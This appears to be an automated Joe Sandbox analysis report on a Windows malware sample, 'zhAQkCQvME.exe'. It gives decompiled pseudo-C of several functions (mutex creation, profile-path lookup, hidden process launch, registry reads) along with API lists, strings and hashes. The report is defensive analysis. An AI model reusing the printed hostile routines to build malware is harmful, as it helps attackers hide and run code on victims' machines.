				char _v164;
				intOrPtr _v168;
				char _v236;
				signed int _v240;
				signed int _v244;
				char _v772;
				signed int _v776;
				signed int _v780;
				signed int _v784;
				signed int _v788;
				WCHAR* _v792;
				signed int _v796;
				short _v1316;
				char _v1324;
				signed int _t118;
				intOrPtr _t119;
				signed int _t132;
				signed int _t136;
				signed int _t137;
				intOrPtr _t138;
				signed int _t147;
				signed int _t155;
				signed int _t159;
				signed int _t161;
				signed int _t170;
				signed int _t175;
				intOrPtr _t176;
				signed int _t177;
				signed int _t178;
				signed int _t179;
				signed int _t188;
				signed int _t217;
				signed int _t237;
				intOrPtr _t255;
				intOrPtr _t256;
				void* _t257;
				void* _t262;
				void* _t264;
				void* _t266;
				void* _t267;
				void* _t272;
				void* _t274;
				void* _t275;
				void* _t278;
				void* _t284;

				_t284 = __fp0;
				_push(0xffffffff);
				_push(0x41c5e8);
				_push(0x403ab6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t255;
				_t256 = _t255 + 0xfffffae4;
				_v28 = _t256;
				_v96 = 0xffffffff;
				_v100 = 0;
				_v36 = 0;
				_v32 = 0;
				_v76 = 0;
				_v8 = 0;
				_v240 = 0;
				_v244 = 0;
				do {
				} while (0 != 0);
				_t118 = E004101E0(_a4,  &_v772, 0x104); // executed
				_t257 = _t256 + 0xc;
				__eflags = _t118;
				if(__eflags != 0) {
					_t119 = E004098F0(_a8); // executed
					_v168 = _t119;
					E00409590(__eflags, _t284, _v168,  &_v72, 0x20);
					E0040F4D0(__eflags,  &_v72,  &_v236,  &_v164);
					E00409910( &_v92, _t284, E0040DD20( &_v72, lstrlenA( &_v72), 0),  &_v92);
					_t262 = _t257 + 0x30;
					while(1) {
						__eflags = 0;
						if(0 == 0) {
							break;
						}
					}
					E00409410(0, 0); // executed
					E00408C60(); // executed
					E00408C90(); // executed
					_t132 = E00410310(_t284, _a4,  &_v72,  *(_a12 + 0xc)); // executed
					_t264 = _t262 + 0x10;
					_v100 = _t132;
					__eflags = _v100;
					if(_v100 != 0) {
						_push(0);
						_push( &_v164);
						_push(0x4187f0);
						_v32 = E00404CB0(_v100);
						_push(0);
						_push( &_v236);
						_push(0x4187f0);
						_t136 = E00404CB0(_v100);
						_t266 = _t264 + 0x20;
						_v36 = _t136;
						while(1) {
							__eflags = 0;
							if(0 == 0) {
								break;
							}
						}
						_t137 = E0040EEC0(0,  &_v72); // executed
						_t267 = _t266 + 4;
						_v240 = _t137;
						_t138 = _a12;
						_t209 =  *(_t138 + 0xc) & 0x00000001;
						__eflags =  *(_t138 + 0xc) & 0x00000001;
						if(( *(_t138 + 0xc) & 0x00000001) != 0) {
							L35:
							__eflags =  *0x41fb68 - 3;
							if( *0x41fb68 == 3) {
								_t217 =  *0x421408; // 0x0
								_t209 = _t217 & 0x00000004;
								__eflags = _t217 & 0x00000004;
								if((_t217 & 0x00000004) == 0) {
									__eflags =  *0x421408;
									if( *0x421408 == 0) {
										_t209 = _v100;
										E0040C320(_v100, _v100);
										_t267 = _t267 + 4;
									}
								} else {
									E0040C2C0(_t209, _v100);
									E0040C320(_t209, _v100);
									_t267 = _t267 + 8;
								}
							}
							__eflags = _v240;
							if(_v240 == 0) {
								L42:
								E00408FD0(0xe, 0x415286);
								_v796 = 0;
								lstrcpynW( &_v1316, "C:\Users\Luke\Desktop\zhAQkCQvME.exe", 0x104);
								_v792 = E00407F40(_t209, 0x5bf);
								lstrcatW( &_v1316, _v792);
								E00408170( &_v792);
								_v796 = E00408FF0(_v792, __eflags, 0xa);
								_t147 = E0040E080( &_v1316,  &_v1316); // executed
								_t272 = _t267 + 0x18;
								__eflags = _t147;
								if(_t147 != 0) {
									E004093B0( &_v1316,  &_v1316, 0);
									_t272 = _t272 + 8;
								}
								__eflags = _v796;
								if(_v796 != 0) {
									E00408FD0(0xa, _v796);
									_t272 = _t272 + 8;
								}
								_t212 = _a12;
								__eflags =  *(_a12 + 0xc) & 0x00000001;
								if(__eflags != 0) {
									while(1) {
										_t209 = 0;
										__eflags = 0;
										if(0 == 0) {
											goto L60;
										}
									}
									goto L60;
								} else {
									_t155 = E00408FF0(_t212, __eflags, 0xb);
									_t274 = _t272 + 4;
									__eflags = _t155;
									if(__eflags == 0) {
										_t212 =  *((intOrPtr*)(_a12 + 4));
										E00403AC0( &_v1324, 7, 0x418818,  *((intOrPtr*)(_a12 + 4)));
										E00408FD0(0xb,  &_v1324);
										_t274 = _t274 + 0x18;
									}
									E0040F590(_t212, __eflags);
									E004090E0( &_v72, _v36,  &_v72); // executed
									_t275 = _t274 + 8;
									while(1) {
										__eflags = 0;
										if(0 == 0) {
											break;
										}
									}
									_t209 = _v32;
									_t159 = E0040FFD0("C:\Users\Luke\Desktop\zhAQkCQvME.exe", _v32); // executed
									_t272 = _t275 + 8;
									_v96 = _t159;
									__eflags = _v96;
									if(_v96 >= 0) {
										_t237 =  *0x421408; // 0x0
										__eflags = _t237 & 0x00000080;
										if((_t237 & 0x00000080) != 0) {
											L56:
											E0040BFC0(0x2538, 0x64);
											_t272 = _t272 + 8;
											L57:
											goto L60;
										}
										_t161 =  *0x421408; // 0x0
										__eflags = _t161 & 0x00000002;
										if((_t161 & 0x00000002) == 0) {
											goto L57;
										}
										goto L56;
									}
									_v8 = 0xffffffff;
									goto L65;
								}
							} else {
								_t170 = E0040E080(_t209, _v32);
								_t272 = _t267 + 4;
								__eflags = _t170;
								if(_t170 != 0) {
									L60:
									E0040FC40(_t209, _t284, _v100,  &_v72, 0);
									_t264 = _t272 + 0xc;
									__eflags = _a16;
									if(_a16 != 0) {
										lstrcpyW(_a16, _v32);
									}
									__eflags = _a20;
									if(_a20 != 0) {
										lstrcpyA(_a20,  &_v72);
									}
									_v96 = 0;
									_v8 = 0xffffffff;
									L65:
									E00408C10(1); // executed
									while(1) {
										__eflags = 0;
										if(0 == 0) {
											break;
										}
									}
									 *[fs:0x0] = _v20;
									return _v96;
								}
								goto L42;
							}
						}
						_v776 = 0;
						_t175 = E0040E080(_t209, _v36); // executed
						_t267 = _t267 + 4;
						__eflags = _t175;
						if(_t175 != 0) {
							_t209 = _v36;
							E004093B0(_v36, _v36,  &_v72);
							_t267 = _t267 + 8;
							_v776 = 1;
						}
						while(1) {
							__eflags = 0;
							if(0 == 0) {
								break;
							}
						}
						_t176 = _a12;
						__eflags =  *((intOrPtr*)(_t176 + 4)) - 2;
						if( *((intOrPtr*)(_t176 + 4)) != 2) {
							goto L35;
						}
						__eflags = _v240;
						if(__eflags != 0) {
							L23:
							_t177 = E004094A0(_t209, 0, __eflags, 2, 0x384);
							_t267 = _t267 + 8;
							__eflags = _t177;
							if(_t177 != 0) {
								goto L35;
							}
							_v780 = 0;
							while(1) {
								_t209 = 0;
								__eflags = 0;
								if(0 == 0) {
									break;
								}
							}
							_t178 = E00403EE0(0, 0x400);
							_t267 = _t267 + 4;
							_v780 = _t178;
							__eflags = _v780;
							if(_v780 != 0) {
								__eflags = _v240;
								if(_v240 == 0) {
									_t179 = E00408060(0, 0x24e4);
									_t278 = _t267 + 4;
									_v788 = _t179;
									__eflags = _v788;
									if(_v788 != 0) {
										_push(_a8);
										E00403AC0(_v780, 0x400, _v788, _v36);
										_push(_v780);
										__eflags = _a12 + 0x14;
										_t209 =  &_v92;
										E0040FDE0(_t284,  &_v92, _a12 + 0x14, 0);
										E00408170( &_v788);
										_t278 = _t278 + 0x28;
									}
								} else {
									_t188 = E00408060(0, 0x1bf5);
									_t278 = _t267 + 4;
									_v784 = _t188;
									__eflags = _v784;
									if(_v784 != 0) {
										_push(_a8);
										E00403AC0(_v780, 0x400, _v784,  &_v72);
										_push(_v780);
										_t209 = _a12 + 0x14;
										__eflags = _a12 + 0x14;
										E0040FDE0(_t284,  &_v92, _a12 + 0x14, 1);
										E00408170( &_v784);
										_t278 = _t278 + 0x28;
									}
								}
								E00403F10( &_v780, 0);
								_t267 = _t278 + 8;
							}
							goto L35;
						}
						__eflags = _v776;
						if(__eflags == 0) {
							goto L35;
						}
						goto L23;
					}
					_v96 = 0xfffffffe;
					_v8 = 0xffffffff;
				} else {
					goto L4;
				}
				goto L65;
				L4:
				__eflags = 0;
				if(0 == 0) {
					_v96 = 0xffffffff;
					_v8 = 0xffffffff;
					goto L65;
				} else {
					goto L4;
				}
			}

0x0040ef00
0x0040ef03
0x0040ef05
0x0040ef0a
0x0040ef15
0x0040ef16
0x0040ef1d
0x0040ef26
0x0040ef29
0x0040ef30
0x0040ef37
0x0040ef3e
0x0040ef45
0x0040ef4c
0x0040ef53
0x0040ef5d
0x0040ef67
0x0040ef67
0x0040ef7d
0x0040ef82
0x0040ef85
0x0040ef87
0x0040efa6
0x0040efae
0x0040efc1
0x0040efdb
0x0040f001
0x0040f006
0x0040f009
0x0040f009
0x0040f00b
0x00000000
0x00000000
0x0040f00d
0x0040f011
0x0040f019
0x0040f01e
0x0040f032
0x0040f037
0x0040f03a
0x0040f03d
0x0040f041
0x0040f056
0x0040f05e
0x0040f05f
0x0040f070
0x0040f073
0x0040f07b
0x0040f07c
0x0040f085
0x0040f08a
0x0040f08d
0x0040f090
0x0040f090
0x0040f092
0x00000000
0x00000000
0x0040f094
0x0040f09a
0x0040f09f
0x0040f0a2
0x0040f0a8
0x0040f0ae
0x0040f0ae
0x0040f0b1
0x0040f24b
0x0040f24b
0x0040f252
0x0040f254
0x0040f25a
0x0040f25a
0x0040f25d
0x0040f279
0x0040f280
0x0040f282
0x0040f286
0x0040f28b
0x0040f28b
0x0040f25f
0x0040f263
0x0040f26f
0x0040f274
0x0040f274
0x0040f25d
0x0040f28e
0x0040f295
0x0040f2ab
0x0040f2b2
0x0040f2ba
0x0040f2d5
0x0040f2e8
0x0040f2fc
0x0040f309
0x0040f31b
0x0040f328
0x0040f32d
0x0040f330
0x0040f332
0x0040f33d
0x0040f342
0x0040f342
0x0040f345
0x0040f34c
0x0040f357
0x0040f35c
0x0040f35c
0x0040f35f
0x0040f365
0x0040f368
0x0040f414
0x0040f414
0x0040f414
0x0040f416
0x00000000
0x00000000
0x0040f418
0x00000000
0x0040f36e
0x0040f370
0x0040f375
0x0040f378
0x0040f37a
0x0040f37f
0x0040f391
0x0040f3a2
0x0040f3a7
0x0040f3a7
0x0040f3aa
0x0040f3b7
0x0040f3bc
0x0040f3bf
0x0040f3bf
0x0040f3c1
0x00000000
0x00000000
0x0040f3c3
0x0040f3c5
0x0040f3ce
0x0040f3d3
0x0040f3d6
0x0040f3d9
0x0040f3dd
0x0040f3eb
0x0040f3f1
0x0040f3f7
0x0040f403
0x0040f40a
0x0040f40f
0x0040f412
0x00000000
0x0040f412
0x0040f3f9
0x0040f3fe
0x0040f401
0x00000000
0x00000000
0x00000000
0x0040f401
0x0040f3df
0x00000000
0x0040f3df
0x0040f297
0x0040f29b
0x0040f2a0
0x0040f2a3
0x0040f2a5
0x0040f41a
0x0040f424
0x0040f429
0x0040f42c
0x0040f430
0x0040f43a
0x0040f43a
0x0040f440
0x0040f444
0x0040f44e
0x0040f44e
0x0040f454
0x0040f45b
0x0040f49d
0x0040f49f
0x0040f4a7
0x0040f4a7
0x0040f4a9
0x00000000
0x00000000
0x0040f4ab
0x0040f4b3
0x0040f4c0
0x0040f4c0
0x00000000
0x0040f2a5
0x0040f295
0x0040f0b7
0x0040f0c5
0x0040f0ca
0x0040f0cd
0x0040f0cf
0x0040f0d5
0x0040f0d9
0x0040f0de
0x0040f0e1
0x0040f0e1
0x0040f0eb
0x0040f0eb
0x0040f0ed
0x00000000
0x00000000
0x0040f0ef
0x0040f0f1
0x0040f0f4
0x0040f0f8
0x00000000
0x00000000
0x0040f0fe
0x0040f105
0x0040f114
0x0040f11b
0x0040f120
0x0040f123
0x0040f125
0x00000000
0x00000000
0x0040f12b
0x0040f135
0x0040f135
0x0040f135
0x0040f137
0x00000000
0x00000000
0x0040f139
0x0040f140
0x0040f145
0x0040f148
0x0040f14e
0x0040f155
0x0040f15b
0x0040f162
0x0040f1d5
0x0040f1da
0x0040f1dd
0x0040f1e3
0x0040f1ea
0x0040f1ef
0x0040f207
0x0040f215
0x0040f21b
0x0040f21f
0x0040f223
0x0040f232
0x0040f237
0x0040f237
0x0040f164
0x0040f169
0x0040f16e
0x0040f171
0x0040f177
0x0040f17e
0x0040f183
0x0040f19b
0x0040f1a9
0x0040f1af
0x0040f1af
0x0040f1b7
0x0040f1c6
0x0040f1cb
0x0040f1cb
0x0040f1ce
0x0040f243
0x0040f248
0x0040f248
0x00000000
0x0040f155
0x0040f107
0x0040f10e
0x00000000
0x00000000
0x00000000
0x0040f10e
0x0040f043
0x0040f04a
0x00000000
0x00000000
0x00000000
0x00000000
0x0040ef89
0x0040ef89
0x0040ef8b
0x0040ef8f
0x0040ef96
0x00000000
0x0040ef8d
0x00000000
0x0040ef8d

APIs

Part of subcall function 00409590: lstrlenA.KERNEL32(?), ref: 00409615

Part of subcall function 0040F4D0: lstrlenA.KERNEL32(?), ref: 0040F4E8
Part of subcall function 0040F4D0: lstrcatW.KERNEL32(?,?), ref: 0040F51E
Part of subcall function 0040F4D0: lstrcatW.KERNEL32(?,?), ref: 0040F566

lstrlenA.KERNEL32(?,00000000,?), ref: 0040EFED

Part of subcall function 00404CB0: lstrlenW.KERNEL32(0041E1A0), ref: 00404CD8

Part of subcall function 00404CB0: lstrcatW.KERNEL32(00000000,00000000), ref: 00404D31

lstrcpynW.KERNEL32(?,C:\Users\user\Desktop\zhAQkCQvME.exe,00000104), ref: 0040F2D5
lstrcatW.KERNEL32(?,?), ref: 0040F2FC

Part of subcall function 00403AC0: wvnsprintfA.SHLWAPI(?,?,?,?), ref: 00403AEE
Part of subcall function 00403AC0: lstrlenA.KERNEL32(00000000), ref: 00403B12

lstrcpyW.KERNEL32(00000000,?), ref: 0040F43A
lstrcpyA.KERNEL32(?,?), ref: 0040F44E

Strings

C:\Users\user\Desktop\zhAQkCQvME.exe, xrefs: 0040F2C9
C:\Users\user\Desktop\zhAQkCQvME.exe, xrefs: 0040F3C9

Memory Dump Source

Source File: 00000000.00000002.470640963.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.470633953.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470675585.00415000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470699643.0041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.470722428.00422000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zhAQkCQvME.jbxd

Similarity

API ID: lstrlen$lstrcat$lstrcpy$lstrcpynwvnsprintf
String ID: C:\Users\user\Desktop\zhAQkCQvME.exe$C:\Users\user\Desktop\zhAQkCQvME.exe
API String ID: 2720427607-3346499997
Opcode ID: b846235ef9f2758dcb12366824f3efbb1ed110bb0adc09aaf79f480984adc2ec
Instruction ID: 177e132ed21888145a44946132bea40a6571c39ff1d2d9a8190bd52c58202954
Opcode Fuzzy Hash: b846235ef9f2758dcb12366824f3efbb1ed110bb0adc09aaf79f480984adc2ec
Instruction Fuzzy Hash: 0AE1B8B5D002089BDB20DB91DC46BEF7378AB54308F04457EF509762C2EB799A49CF95

Uniqueness

Uniqueness Score: 100.00%

Function 0040DEC0, Relevance: 12.1, APIs: 8, Instructions: 74
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 20%

			E0040DEC0(intOrPtr _a4, WCHAR* _a8) {
				void* _v8;
				void _v530;
				short _v532;
				int _v536;
				void _v1058;
				char _v1060;
				short _t19;
				int* _t24;
				intOrPtr* _t38;
				short _t39;
				void* _t44;

				_v536 = 0x104;
				_t19 =  *0x415240; // 0x0
				_v1060 = _t19;
				memset( &_v1058, 0, 0x206);
				_t39 =  *0x415240; // 0x0
				_v532 = _t39;
				memset( &_v530, 0, 0x206);
				__imp__SHGetFolderPathW(0, _a4, 0, 1,  &_v1060); // executed
				_v8 = E00407230( &_v1060, 8);
				_t24 =  &_v536;
				__imp__GetUserProfileDirectoryW(_v8,  &_v532, _t24); // executed
				if(_t24 != 0) {
					L5:
					CloseHandle(_v8); // executed
					lstrcpynW(_a8, _t44 + lstrlenW( &_v532) * 2 - 0x41e, 0x104);
					return 1;
				}
				while(0 != 0) {
				}
				_t38 =  *0x41f864; // 0x164f7d0
				if(E00407660( *_t38) != 0) {
					__imp__SHGetFolderPathW(0, 0x24, 0, 1,  &_v532);
				}
				goto L5;
			}

0x0040dec9
0x0040ded3
0x0040ded9
0x0040deee
0x0040def6
0x0040defd
0x0040df12
0x0040df2b
0x0040df3b
0x0040df3e
0x0040df50
0x0040df58
0x0040df8a
0x0040df8e
0x0040dfb2
0x0040dfc0
0x0040dfc0
0x0040df5a
0x0040df5e
0x0040df60
0x0040df73
0x0040df84
0x0040df84
0x00000000

APIs

memset.MSVCRT ref: 0040DEEE
memset.MSVCRT ref: 0040DF12
SHGetFolderPathW.SHELL32(00000000,?,00000000,00000001,?), ref: 0040DF2B

Part of subcall function 00407230: GetCurrentThread.KERNEL32(00407583,00000000,00000008,?,?,00407583,00000008), ref: 0040723E
Part of subcall function 00407230: OpenThreadToken.ADVAPI32(00000000,?,?,00407583,00000008), ref: 00407245
Part of subcall function 00407230: GetLastError.KERNEL32(?,?,00407583,00000008), ref: 0040724F
Part of subcall function 00407230: GetCurrentProcess.KERNEL32(00407583,00000008,?,?,00407583,00000008), ref: 00407264
Part of subcall function 00407230: OpenProcessToken.ADVAPI32(00000000,?,?,00407583,00000008), ref: 0040726B

GetUserProfileDirectoryW.USERENV(?,?,?), ref: 0040DF50
SHGetFolderPathW.SHELL32(00000000,00000024,00000000,00000001,?), ref: 0040DF84
CloseHandle.KERNELBASE(?), ref: 0040DF8E
lstrlenW.KERNEL32(?,00000104), ref: 0040DFA0
lstrcpynW.KERNEL32(?,?), ref: 0040DFB2

Memory Dump Source

Source File: 00000000.00000002.470640963.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.470633953.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470675585.00415000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470699643.0041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.470722428.00422000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zhAQkCQvME.jbxd

Similarity

API ID: CurrentFolderOpenPathProcessThreadTokenmemset$CloseDirectoryErrorHandleLastProfileUserlstrcpynlstrlen
String ID:
API String ID: 1387508236-0
Opcode ID: a4ebf17ab40fc67a940aa49a3052e061888f13aa40cbbe653cdee7305fb8cd27
Instruction ID: 7eaa66d3a456f29eae2fc93e40ab11648c4b983ef132837e68fee470de0f55eb
Opcode Fuzzy Hash: a4ebf17ab40fc67a940aa49a3052e061888f13aa40cbbe653cdee7305fb8cd27
Instruction Fuzzy Hash: 3221A9B5A40309EBD710DFA0DC49FEA3378BB58704F0045B9FA09961C0E7B59A84CF59

Uniqueness

Uniqueness Score: 5.54%

Function 004017D0, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 69
UNIQUE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 32%

			E004017D0() {
				void _v131;
				char _v132;
				void _v195;
				char _v196;
				int _v200;
				char _t13;
				char _t29;

				_t13 =  *0x41f6d9; // 0x0
				_v196 = _t13;
				memset( &_v195, 0, 0x3f); // executed
				_t29 =  *0x41f6da; // 0x0
				_v132 = _t29;
				memset( &_v131, 0, 0x7f);
				_v200 = 0;
				while(1) {
					_t27 = 0;
					if(0 == 0) {
						break;
					}
				}
				_push(GetCurrentProcessId());
				E00403AC0( &_v196, 0x40, "2%s%u", "zhAQkCQvME");
				if(E004071D0(0,  &_v196) != 0) {
					while(1) {
						_t27 = 0;
						if(0 == 0) {
							goto L6;
						}
					}
				}
				L6:
				_push(0);
				_push("zhAQkCQvME");
				E00404D50(0x41e02c,  &_v132, 0x104, "Global");
				_v200 = E00407130(_t27,  &_v132);
				if(_v200 != 0) {
					while(0 != 0) {
					}
					E00407170(0, _v200, 0x3a98);
				}
				return 1;
			}

0x004017d9
0x004017de
0x004017ef
0x004017f7
0x004017fd
0x00401808
0x00401810
0x0040181a
0x0040181a
0x0040181c
0x00000000
0x00000000
0x0040181e
0x00401826
0x0040183a
0x00401853
0x00401855
0x00401855
0x00401857
0x00000000
0x00000000
0x00401859
0x00401855
0x0040185b
0x0040185b
0x0040185d
0x00401875
0x00401889
0x00401896
0x00401898
0x0040189c
0x004018aa
0x004018af
0x004018ba

APIs

memset.MSVCRT ref: 004017EF
memset.MSVCRT ref: 00401808
GetCurrentProcessId.KERNEL32 ref: 00401820

Strings

zhAQkCQvME, xrefs: 00401827, 0040185D
2%s%u, xrefs: 0040182C
Global, xrefs: 00401862

Memory Dump Source

Source File: 00000000.00000002.470640963.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.470633953.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470675585.00415000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470699643.0041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.470722428.00422000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zhAQkCQvME.jbxd

Similarity

API ID: memset$CurrentProcess
String ID: 2%s%u$Global$zhAQkCQvME
API String ID: 3558556355-117130256
Opcode ID: 3f057ca85593a87d5071df424afd6f88a8e3297ff2bf3085493f9a80ba4ba291
Instruction ID: 20021773353b55cee90fcff4185e7e598c9486acf236810baa0cd9cad6b5fb3e
Opcode Fuzzy Hash: 3f057ca85593a87d5071df424afd6f88a8e3297ff2bf3085493f9a80ba4ba291
Instruction Fuzzy Hash: D52105B6E41204A6EB10B7609C43FF93A386B04708F0441BFFA05772D2EABC5748CB5A

Uniqueness

Uniqueness Score: 100.00%

Function 005C1827, Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 275
memoryUNIQUE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE ref: 005C18F9
VirtualProtect.KERNELBASE ref: 005C19B9
VirtualProtect.KERNELBASE ref: 005C1CA0

Strings

p, xrefs: 005C1B05
Cy, xrefs: 005C1855

Memory Dump Source

Source File: 00000000.00000002.470846166.005C0000.00000040.00000001.sdmp, Offset: 005C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c0000_zhAQkCQvME.jbxd

Similarity

API ID: ProtectVirtual
String ID: Cy$p
API String ID: 544645111-1378413450
Opcode ID: 36f49417f12721d97f6f4f37209ef26d0a1f0b8cc5dab0b6c6a82cbfb7fbe18e
Instruction ID: e159b5baee07227557cab12075a3cba023f2d6190c5c63e883bf7cf1867bf53e
Opcode Fuzzy Hash: 36f49417f12721d97f6f4f37209ef26d0a1f0b8cc5dab0b6c6a82cbfb7fbe18e
Instruction Fuzzy Hash: 2FD1E175A087818FD324CF29C080B9AFBE1BFD9314F15895EE99D97312E731A841CB96

Uniqueness

Uniqueness Score: 100.00%

Function 004041B0, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 76
processsynchronizationUNIQUE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 37%

			E004041B0(void* __ecx, WCHAR* _a4, DWORD* _a8, long _a12, intOrPtr _a16) {
				WCHAR* _v8;
				struct _PROCESS_INFORMATION _v24;
				long _v28;
				struct _STARTUPINFOW _v100;
				long _v104;
				int _t29;

				_v8 = 0;
				_v28 = 0;
				E00404120(__ecx,  &_v100, 0, 0x44);
				_t4 =  &_v24; // 0x403963
				E00404120(_t4, _t4, 0, 0x10);
				_v100.cb = 0x44;
				if(_a16 != 0) {
					_v100.dwFlags = 1;
					_v100.wShowWindow = 0;
					_v28 = 0x8000000;
				}
				_t29 = CreateProcessW(0, _a4, 0, 0, 0, _v28, 0, 0,  &_v100,  &_v24); // executed
				if(_t29 == 0) {
					while(0 != 0) {
					}
					_v8 = 0;
				} else {
					while(0 != 0) {
					}
					if(_a8 != 0) {
						_v104 = WaitForSingleObject(_v24.hProcess, _a12);
						if(_v104 >= 0) {
							GetExitCodeProcess(_v24, _a8); // executed
							while(0 != 0) {
							}
						} else {
							while(0 != 0) {
							}
						}
					}
					_v8 = 1;
				}
				return _v8;
			}

0x004041b6
0x004041bd
0x004041cc
0x004041d8
0x004041dc
0x004041e4
0x004041ef
0x004041f1
0x004041fa
0x004041fe
0x004041fe
0x00404221
0x00404229
0x00404273
0x00404277
0x00404279
0x0040422b
0x0040422b
0x0040422f
0x00404235
0x00404245
0x0040424c
0x0040425e
0x00404264
0x00404268
0x0040424e
0x0040424e
0x00404252
0x00404254
0x0040424c
0x0040426a
0x0040426a
0x00404286

APIs

CreateProcessW.KERNEL32(00000000,00001388,00000000,00000000,00000000,00000000,00000000,00000000,00000044,00000000), ref: 00404221
WaitForSingleObject.KERNEL32(00000000,?), ref: 0040423F
GetExitCodeProcess.KERNELBASE(00000000,00000000), ref: 0040425E

Strings

D, xrefs: 004041E4
c9@, xrefs: 004041D8, 004041DB

Memory Dump Source

Source File: 00000000.00000002.470640963.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.470633953.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470675585.00415000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470699643.0041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.470722428.00422000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zhAQkCQvME.jbxd

Similarity

API ID: Process$CodeCreateExitObjectSingleWait
String ID: D$c9@
API String ID: 3724699811-1992853678
Opcode ID: dd4dee72d1cc9a5d620f3aef2e0ba0238fa6e0444b555acbb08b93ef6fa6b986
Instruction ID: eb18ad04b14664084eb5de7a8cb4b68a0a7bfd2e950e1a10e9ce7e0c00645286
Opcode Fuzzy Hash: dd4dee72d1cc9a5d620f3aef2e0ba0238fa6e0444b555acbb08b93ef6fa6b986
Instruction Fuzzy Hash: 0A2132B0A05308EADF10DF90D949BAF77B4AB84745F20806EB705BB2C0D7785A45CB9A

Uniqueness

Uniqueness Score: 100.00%

Function 0040E0A0, Relevance: 7.6, APIs: 5, Instructions: 95
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 62%

			E0040E0A0(void* _a4, short* _a8, short* _a12, intOrPtr* _a16) {
				char* _v8;
				int _v12;
				void* _v16;
				int _v20;
				int* _v24;
				long _t36;
				long _t38;
				char* _t39;
				long _t41;
				void* _t65;

				_v12 = 0;
				_v20 = 0;
				_v24 = 0;
				_v16 = 0;
				_v8 = 0;
				_t36 = RegOpenKeyExW(_a4, _a8, 0, 0x20019,  &_v16); // executed
				_v24 = _t36;
				if(_v24 == 0) {
					_t54 = _v16;
					_t38 = RegQueryValueExW(_v16, _a12, 0,  &_v12, 0,  &_v20); // executed
					_v24 = _t38;
					if(_v24 == 0) {
						_t39 = E00403EE0(_t54, _v20);
						_t65 = _t65 + 4;
						_v8 = _t39;
						if(_v8 != 0) {
							_t41 = RegQueryValueExW(_v16, _a12, 0, 0, _v8,  &_v20); // executed
							_v24 = _t41;
							if(_v24 == 0) {
								if(_a16 != 0) {
									 *_a16 = _v20;
								}
								RegCloseKey(_v16); // executed
								return _v8;
							}
							while(0 != 0) {
							}
							L17:
							if(_v8 != 0) {
								E00403F10( &_v8, 0xfffffffe);
							}
							if(_v16 != 0) {
								RegCloseKey(_v16);
							}
							return 0;
						}
						while(0 != 0) {
						}
						goto L17;
					}
					goto L17;
				}
				while(0 != 0) {
				}
				return 0;
			}

0x0040e0a6
0x0040e0ad
0x0040e0b4
0x0040e0bb
0x0040e0c2
0x0040e0dc
0x0040e0e2
0x0040e0e9
0x0040e108
0x0040e10c
0x0040e112
0x0040e119
0x0040e121
0x0040e126
0x0040e129
0x0040e130
0x0040e14e
0x0040e154
0x0040e15b
0x0040e169
0x0040e171
0x0040e171
0x0040e177
0x00000000
0x0040e17d
0x0040e15d
0x0040e161
0x0040e182
0x0040e186
0x0040e18e
0x0040e193
0x0040e19a
0x0040e1a0
0x0040e1a0
0x00000000
0x0040e1a6
0x0040e132
0x0040e136
0x00000000
0x0040e138
0x00000000
0x0040e11b
0x0040e0eb
0x0040e0ef
0x00000000

APIs

RegOpenKeyExW.KERNEL32(?,?,00000000,00020019,?), ref: 0040E0DC
RegQueryValueExW.KERNEL32(?,?,00000000,?,00000000,?), ref: 0040E10C
RegCloseKey.ADVAPI32(?), ref: 0040E1A0

Part of subcall function 00403EE0: RtlAllocateHeap.NTDLL(015D0000,00000008,00415340,?,?,00403F90,00407DD5,?,?,00407DD6,00415340,00000839), ref: 00403EF1

RegQueryValueExW.KERNEL32(?,?,00000000,00000000,?,?), ref: 0040E14E
RegCloseKey.KERNEL32(?), ref: 0040E177

Memory Dump Source

Source File: 00000000.00000002.470640963.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.470633953.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470675585.00415000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470699643.0041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.470722428.00422000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zhAQkCQvME.jbxd

Similarity

API ID: CloseQueryValue$AllocateHeapOpen
String ID:
API String ID: 1478913703-0
Opcode ID: 36d5ca2778c0bd8dd114dac4eeddc6d27a8d281cbb889f0afd147a41b08ef5e6
